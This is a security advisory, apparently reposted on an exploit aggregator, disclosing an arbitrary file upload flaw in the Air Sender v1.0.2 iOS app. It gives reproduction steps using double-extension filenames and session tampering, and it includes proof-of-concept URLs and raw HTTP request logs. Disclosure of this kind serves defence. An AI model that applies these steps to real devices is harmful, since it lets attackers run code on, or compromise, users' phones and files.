Exploit for Air Sender 1.0.2 Arbitrary File Upload

Name: Exploit for Air Sender 1.0.2 Arbitrary File Upload
Rating: 5 (74 reviews)
2020-04-24 | CVSS -0.0
## https://sploitus.com/exploit?id=PACKETSTORM:157382
Document Title:  
===============  
Air Sender v1.0.2 iOS - Arbitrary File Upload Vulnerability  
  
References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2212  
  
Release Date:  
=============  
2020-04-24  
  
Common Vulnerability Scoring System:  
====================================  
7.4  
  
Vulnerability Class:  
====================  
Arbitrary File Upload  
  
Affected Product(s):  
====================  
Tran Tu  
Air Sender v1.0.2 iOS - Apple iOS Mobile Web Application  
  
Exploitation Technique:  
=======================  
Remote  
  
Severity Level:  
===============  
High  
  
Technical Details & Description:  
================================  
An arbitrary file upload web vulnerability has been discovered in the  
official Air Sender v1.0.2 iOS mobile application.  
The web vulnerability allows remote attackers to upload arbitrary files  
to compromise for example the file system of a service.  
  
The arbitrary upload vulnerability is located in the within the  
web-server configuration when using the upload module.  
Remote attackers are able to bypass the local web-server configuration  
by an upload of malicious webshells. Attackers  
are able to inject own files with malicious `filename` values in the  
`upload` POST method request to compromise the  
mobile web-application. The application does not perform checks for  
multiple file extensions. Thus allows an attacker  
to upload for example to upload a html.js.png file. After the upload the  
attacker requests the original url source  
with the uploaded file and removes the unwanted extension to execute the  
code in the unprotected web-frontend.  
  
The security risk of the vulnerability is estimated as high with a  
common vulnerability scoring system count of 7.0.  
Exploitation of the web vulnerability requires a low privilege ftp  
application user account and no user interaction.  
Successful exploitation of the arbitrary file upload web vulnerability  
results in application or device compromise.  
  
Request Method(s):  
[+] POST  
  
Vulnerable Module(s):  
[+] ./upload  
  
Vulnerable File(s):  
[+] list?path=  
[+] download?path=  
  
  
Proof of Concept (PoC):  
=======================  
The arbitrary file upload vulnerability can be exploited by remote  
attackers without user interaction and with local network access.  
For security demonstration or to reproduce the vulnerability follow the  
provided information and steps below to continue.  
  
  
Manual steps to reproduce the vulnerability ...  
1. Install and start the ios mobile application on your apple device  
2. Open your local browser and start to tamper the http session  
2. Open the wifi user interface without authentication by default  
4. Click upload, choose any file  
5. Change the files name to your script code test payload via session tamper  
6. Continue to submit the manipulated content  
7. Open the via the list or download url to the uploaded html / js file  
to execute it  
8. Successful reproduce of the mobile ios vulnerability!  
  
  
PoC: Exploitation  
http://localhost/download?path=0010101001.html.js  
http://localhost/download?path=0010101001.html.js  
  
  
--- PoC Session Logs [POST] ---  
http://localhost/upload  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)  
Gecko/20100101 Firefox/75.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------418835692331824972282021572505  
Content-Length: 2609  
Origin: http://localhost  
Connection: keep-alive  
Referer: http://localhost/  
Cookie: _ga=GA1.4.376521534.1586884411; _gid=GA1.4.1374601525.1586884411  
path=/&files[]=0010101001.html.js.png  
-  
POST: HTTP/1.1 200 OK  
Cache-Control: no-cache  
Content-Length: 2  
Content-Type: application/json  
Connection: Close  
Server: GCDWebUploader  
-  
http://localhost/list?path=[PATH]/[Evil.Source]  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)  
Gecko/20100101 Firefox/75.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Connection: keep-alive  
Referer: http://localhost/  
Cookie: _ga=GA1.4.376521534.1586884411; _gid=GA1.4.1374601525.1586884411  
-  
GET: HTTP/1.1 200 OK  
Cache-Control: no-cache  
Content-Length: 381  
Content-Type: application/json  
Connection: Close  
Server: GCDWebUploader  
-  
http://localhost/download?path=0010101001.html.js  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)  
Gecko/20100101 Firefox/75.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
Referer: http://localhost/  
Cookie: _ga=GA1.4.376521534.1586884411; _gid=GA1.4.1374601525.1586884411  
Upgrade-Insecure-Requests: 1  
-  
GET: HTTP/1.1 200 OK  
Connection: Close  
Server: GCDWebUploader  
Date: Tue, 14 Apr 2020 19:35:28 GMT  
Content-Disposition: attachment; filename="0010101001.html.js";  
filename*=UTF-8''0010101001.html.js  
Content-Length: 2270  
Cache-Control: no-cache  
Etag: 4306047746/1586892764/961771080  
  
  
Reference(s):  
http://localhost/list  
http://localhost/upload  
http://localhost/download  
  
  
  
Credits & Authors:  
==================  
Vulnerability-Lab -  
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab  
Benjamin Kunz Mejri -  
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.  
  
  
--   
VULNERABILITY LABORATORY - RESEARCH TEAM  
SERVICE: www.vulnerability-lab.com